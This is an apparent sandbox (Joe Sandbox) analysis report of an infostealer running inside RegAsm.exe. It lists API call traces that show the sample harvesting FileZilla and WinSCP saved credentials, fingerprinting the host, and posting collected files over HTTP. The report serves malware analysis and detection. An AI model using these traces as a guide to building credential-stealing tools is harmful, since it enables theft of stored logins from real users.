                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocNameProcessUser
                                                                            • String ID:
                                                                            • API String ID: 1206570057-0
                                                                            • Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                            • Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
                                                                            • Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
                                                                            • Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoSystemwsprintf
                                                                            • String ID:

                                                                            Control-flow Graph (entry block 4043ad-4044ac)
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004043B2
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                              • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                              • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                              • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                              • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                              • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                              • Part of subcall function 00410DAC: RtlAllocateHeap.NTDLL(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                            • StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A40,00000000,?,?,00000000), ref: 00404B42
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                            • memcpy.MSVCRT ref: 00404B92
                                                                            • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                            • memcpy.MSVCRT ref: 00404BB3
                                                                            • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                            • memcpy.MSVCRT ref: 00404BEA
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                            • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                            • ExitProcess.KERNEL32 ref: 00404CDC
                                                                            • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                            Similarity
                                                                            • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data

                                                                            Control-flow Graph (entry block 40bbe8-40bca7)
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040BBED
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            • strtok_s.MSVCRT ref: 0040BCCB
                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,00425C43,00425C42,00425C3F,00425C3E), ref: 0040BD1F
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BD88
                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BDC6
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BDD1
                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE0F
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040BE1E
                                                                            • lstrlenA.KERNEL32(?), ref: 0040C019
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                            • memset.MSVCRT ref: 0040C06C
                                                                            Similarity
                                                                            • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                            Control-flow Graph (entry block 40e7b8-40e888)
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040E7BD
                                                                            • memset.MSVCRT ref: 0040E7E6
                                                                            • memset.MSVCRT ref: 0040E806
                                                                            • memset.MSVCRT ref: 0040E81A
                                                                            • memset.MSVCRT ref: 0040E82E
                                                                            • memset.MSVCRT ref: 0040E83D
                                                                            • memset.MSVCRT ref: 0040E84B
                                                                            • memset.MSVCRT ref: 0040E85C
                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E884
                                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8AC
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E8F3
                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E910
                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C37), ref: 0040E9A2
                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E9F4
                                                                            • API ID: memset$Value$Open$EnumH_prolog
                                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                            • API String ID: 784052110-2798830873
                                                                            • Opcode ID: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                            • Instruction ID: d618dc23c2e72a82e05694064c6b478e31e9db7f730d5c61c806b48b50ccc5c5
                                                                            • Opcode Fuzzy Hash: 22ccd7e304eadcc4645c99c76537ddb57fad35517efbdbe2963d3d3b8e3d35a3
                                                                            • Instruction Fuzzy Hash: DBF11CB1D0025DAEDB11EBE1CC81FEEBB7CAF18304F5441BAE515B2182DB785A48CB65

                                                                            Control-flow Graph

                                                                            control_flow_graph 1432 414604-4153f5
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00414609
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FC38: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004264F6), ref: 0040FC46
                                                                              • Part of subcall function 0040FC38: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC4D
                                                                              • Part of subcall function 0040FC38: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004264F6), ref: 0040FC59
                                                                              • Part of subcall function 0040FC38: wsprintfA.USER32 ref: 0040FC84
                                                                              • Part of subcall function 00410415: memset.MSVCRT ref: 0041043B
                                                                              • Part of subcall function 00410415: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                              • Part of subcall function 00410415: RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                              • Part of subcall function 00410415: CharToOemA.USER32(?,?), ref: 00410493
                                                                              • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 004104DD: _EH_prolog.MSVCRT ref: 004104E2
                                                                              • Part of subcall function 004104DD: GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                              • Part of subcall function 004104DD: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                              • Part of subcall function 004104DD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                              • Part of subcall function 004104DD: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004265A8,00000000,?,00000000,00000000,?,HWID: ,00000000,?,0042659C,00000000), ref: 00414922
                                                                              • Part of subcall function 00411001: OpenProcess.KERNEL32(00000410,00000000,2IA), ref: 00411019
                                                                              • Part of subcall function 00411001: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411034
                                                                              • Part of subcall function 00411001: CloseHandle.KERNEL32(00000000), ref: 0041103B
                                                                              • Part of subcall function 0041064B: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                              • Part of subcall function 0041064B: HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                              • Part of subcall function 0041077C: _EH_prolog.MSVCRT ref: 00410781
                                                                              • Part of subcall function 0041077C: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                              • Part of subcall function 0041077C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                              • Part of subcall function 0041077C: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,?,?,?,?,?,?,004265CC,00000000,?), ref: 004107C4
                                                                              • Part of subcall function 0041077C: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                              • Part of subcall function 0041077C: VariantInit.OLEAUT32(?), ref: 00410855
                                                                              • Part of subcall function 00410925: _EH_prolog.MSVCRT ref: 0041092A
                                                                              • Part of subcall function 00410925: CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?,00000000), ref: 00410942
                                                                              • Part of subcall function 00410925: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000), ref: 00410953
                                                                              • Part of subcall function 00410925: CoCreateInstance.OLE32(00426F54,00000000,00000001,00426E84,?,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4,00000000,?), ref: 0041096D
                                                                              • Part of subcall function 00410925: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004109A3
                                                                              • Part of subcall function 00410925: VariantInit.OLEAUT32(?), ref: 004109F6
                                                                              • Part of subcall function 0040FBFD: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000), ref: 0040FC09
                                                                              • Part of subcall function 0040FBFD: HeapAlloc.KERNEL32(00000000,?,?,00414BBE,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FC10
                                                                              • Part of subcall function 0040FBFD: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FC24
                                                                              • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                              • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                              • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                              • Part of subcall function 004103A0: CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 004103B5
                                                                              • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004103C0
                                                                              • Part of subcall function 004103A0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004103CB
                                                                              • Part of subcall function 004103A0: ReleaseDC.USER32(00000000,00000000), ref: 004103D6
                                                                              • Part of subcall function 004103A0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?), ref: 004103E2
                                                                              • Part of subcall function 004103A0: HeapAlloc.KERNEL32(00000000,?,00000000,?,?,00414CC0,?,00000000,?,Display Resolution: ,00000000,?,00426620,00000000,?,00000000), ref: 004103E9
                                                                              • Part of subcall function 004103A0: wsprintfA.USER32 ref: 004103FB
                                                                              • Part of subcall function 0040FCE5: _EH_prolog.MSVCRT ref: 0040FCEA
                                                                              • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,00426257,00000001,?,00000000), ref: 0040FD1C
                                                                              • Part of subcall function 0040FCE5: LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                              • Part of subcall function 0040FCE5: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                              • Part of subcall function 0040FCE5: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                              • Part of subcall function 0040FCE5: LocalFree.KERNEL32(?), ref: 0040FE03
                                                                              • Part of subcall function 0040FC92: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                              • Part of subcall function 0040FC92: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                              • Part of subcall function 0040FC92: GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004265FC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                              • Part of subcall function 0040FC92: wsprintfA.USER32 ref: 0040FCD7
                                                                              • Part of subcall function 0040FE18: GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C), ref: 0040FE2C
                                                                              • Part of subcall function 0040FE18: HeapAlloc.KERNEL32(00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042667C,00000000,?), ref: 0040FE33
                                                                              • Part of subcall function 0040FE18: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040FE51
                                                                              • Part of subcall function 0040FE18: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414F3C,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040FE6D
                                                                              • Part of subcall function 0040FEB4: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FF07
                                                                              • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                              • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                              • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                              • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                              • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                              • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                              • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                              • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                              • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                              • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                              • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                              • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                              • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                              • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                              • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                              • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                              • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                              • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                              • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                              • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                              • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                              • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,004266F0,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,004266E0), ref: 0041537A
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                              • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                              • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                              • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                            • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                            • API String ID: 722754166-3257470747
                                                                            • Opcode ID: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                            • Instruction ID: 34389346271f1e4f7fe34ee782a08fd334c824368f8c7b7c5cb1de368f42fff1
                                                                            • Opcode Fuzzy Hash: 8e79461fdbb141f0f1334f164d06d81da42756099588a8b0a40a232787f46a23
                                                                            • Instruction Fuzzy Hash: 7C921EB190424DE9CB15E7E1C952BEEBB789F24308F5041BEE505725C2DE782B8CCAB5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040C280
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                              • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425B4C,?,?,?,00425B46,?,00000000), ref: 0040C378
                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                            • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                            • lstrcat.KERNEL32(00000000,00425B50), ref: 0040C4A7
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                            • lstrcat.KERNEL32(00000000,00425B54), ref: 0040C4C7
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                            • lstrcat.KERNEL32(00000000,00425B58), ref: 0040C4F6
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                            • lstrcat.KERNEL32(00000000,00425B5C), ref: 0040C525
                                                                            • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                            • lstrcat.KERNEL32(00000000,00425B60), ref: 0040C554
                                                                            • lstrcat.KERNEL32(00000000,00425B64), ref: 0040C562
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                            • memset.MSVCRT ref: 0040C5E9
                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                              • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                              • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                              • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                              • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmp
